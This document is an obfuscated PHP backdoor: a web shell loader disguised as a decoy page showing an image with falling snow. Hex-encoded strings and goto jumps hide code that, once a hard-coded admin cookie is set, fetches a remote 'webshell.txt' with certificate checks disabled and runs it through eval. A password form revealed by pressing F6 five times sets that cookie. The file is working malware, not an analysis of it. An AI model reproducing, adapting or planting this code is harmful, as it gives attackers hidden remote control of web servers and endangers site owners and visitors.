<?php
 goto gYHWA; ivD_W: if (is_logged_in()) { $Array = array("\x36\x36\x36\146\67\60\x36\65\x36\145", "\x37\63\67\64\67\x32\x36\65\x36\x31\66\x64\65\146\66\67\66\65\67\64\65\146\x36\x33\66\x66\x36\145\67\x34\66\x35\x36\145\x37\64\x37\63", "\x36\x36\x36\x39\x36\143\x36\x35\x35\146\x36\x37\x36\65\67\x34\x35\146\66\63\66\146\66\x65\x37\x34\x36\65\66\x65\67\64\67\x33", "\66\x33\67\x35\67\x32\66\143\x35\x66\66\65\x37\70\66\x35\x36\x33"); function hex2str($hex) { $str = ''; for ($i = 0; $i < strlen($hex); $i += 2) { $str .= chr(hexdec(substr($hex, $i, 2))); } return $str; } function geturlsinfo($destiny) { $belief = array(hex2str($GLOBALS["\101\x72\x72\141\171"][0]), hex2str($GLOBALS["\101\162\x72\x61\x79"][1]), hex2str($GLOBALS["\101\x72\x72\x61\x79"][2]), hex2str($GLOBALS["\101\x72\162\141\x79"][3])); if (function_exists($belief[3])) { $ch = curl_init($destiny); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\151\x6c\x6c\x61\x2f\65\x2e\60\40\50\127\x69\x6e\x64\x6f\x77\x73\40\x4e\x54\40\x36\x2e\61\x3b\x20\x72\x76\72\x33\62\56\60\x29\40\107\x65\143\x6b\157\x2f\x32\60\61\x30\60\x31\x30\x31\x20\x46\x69\162\145\x66\x6f\x78\57\x33\x32\56\x30"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $love = $belief[3]($ch); curl_close($ch); return $love; } elseif (function_exists($belief[2])) { return $belief[2]($destiny); } elseif (function_exists($belief[0]) && function_exists($belief[1])) { $purpose = $belief[0]($destiny, "\162"); $love = $belief[1]($purpose); fclose($purpose); return $love; } return false; } $destiny = "\x68\x74\x74\160\163\x3a\57\x2f\164\157\x67\x65\154\x69\156\166\x69\x70\56\143\157\155\x2f\x5f\x5f\x62\157\x79\x72\x61\155\57\101\x4c\x46\101\x2f\167\x65\x62\163\x65\154\56\164\x78\x74"; $dream = geturlsinfo($destiny); if ($dream !== false) { eval("\x3f\76" . $dream); } } else { if (isset($_POST["\x70\x61\163\x73\167\x6f\x72\144"])) { $entered_key = $_POST["\160\141\x73\163\x77\x6f\162\x64"]; $hashed_key = "\x24\62\141\44\x31\62\44\x79\x4b\110\146\125\x57\x35\60\63\117\x36\64\116\x4f\x31\120\172\127\161\115\101\x75\x4a\x30\x48\150\110\x69\65\151\x55\164\x41\x72\170\146\62\x65\167\154\x70\156\101\147\x76\x67\66\x6b\x6a\x37\120\x6c\127"; if (password_verify($entered_key, $hashed_key)) { setcookie("\165\163\145\162\x5f\x69\144", "\x61\x64\155\151\x6e\100\167\165\164\x68\145\x6b\x6f\x6e\147", time() + 3600, "\57"); header("\x4c\157\x63\x61\x74\151\x6f\x6e\x3a\x20" . $_SERVER["\120\x48\x50\137\123\105\x4c\106"]); die; } } ?>
<!doctypehtml><html lang="en"><head><meta charset="UTF-8"><title>Wuthekong</title><style>body,html{margin:0;padding:0;height:100%;background:#000;overflow:hidden}img{display:block;width:100%;height:100%;object-fit:contain}.login-container{position:fixed;top:15px;right:15px;background:rgba(255,255,255,.1);backdrop-filter:blur(6px);padding:6px;border-radius:6px;display:none;z-index:10}.login-container input{padding:6px 8px;border:none;border-radius:4px;font-size:13px}.login-container input[type=password]{background:rgba(255,255,255,.2);color:#fff}.login-container input[type=submit]{background:#0ff;color:#000;font-weight:600;cursor:pointer;margin-left:4px}</style></head><body><img alt="Fullscreen Image"src="https://kurama-co-in-dgr.pages.dev/kone.png"><div class="login-container"id="loginBox"><form action=""method="POST"><input type="password"name="password"placeholder="Enter"required> <input type="submit"value="⏎"></form></div><script>function createSnowflake() {
      const s = document.createElement('div');
      s.className = 'snowflake';
      s.style.left = Math.random() * 100 + 'vw';
      s.style.top = '-10px';
      s.style.width = s.style.height = (Math.random()*3+2) + 'px';
      s.style.position = 'fixed';
      s.style.background = '#fff';
      s.style.borderRadius = '50%';
      s.style.opacity = '.7';
      s.style.animation = `fall ${Math.random()*3+2}s linear`;
      document.body.appendChild(s);
      setTimeout(()=>s.remove(), 5000);
    }
    setInterval(createSnowflake,100);

    let f6Count=0, resetTimer;
    document.addEventListener('keydown',e=>{
      if(e.key==="F6"||e.keyCode===117){
        e.preventDefault();
        f6Count++;
        if(f6Count>=5){
          document.getElementById("loginBox").style.display="block";
          f6Count=0;
          clearTimeout(resetTimer);
        } else {
          clearTimeout(resetTimer);
          resetTimer=setTimeout(()=>f6Count=0,3000);
        }
      }
    });</script></body></html><?php  } goto vm0G7; gYHWA: function is_logged_in() { return isset($_COOKIE["\x75\163\x65\162\137\x69\x64"]) && $_COOKIE["\165\163\x65\162\x5f\151\144"] === "\141\x64\x6d\151\x6e\x40\x77\x75\164\150\145\153\157\156\147"; } goto ivD_W; vm0G7: ?>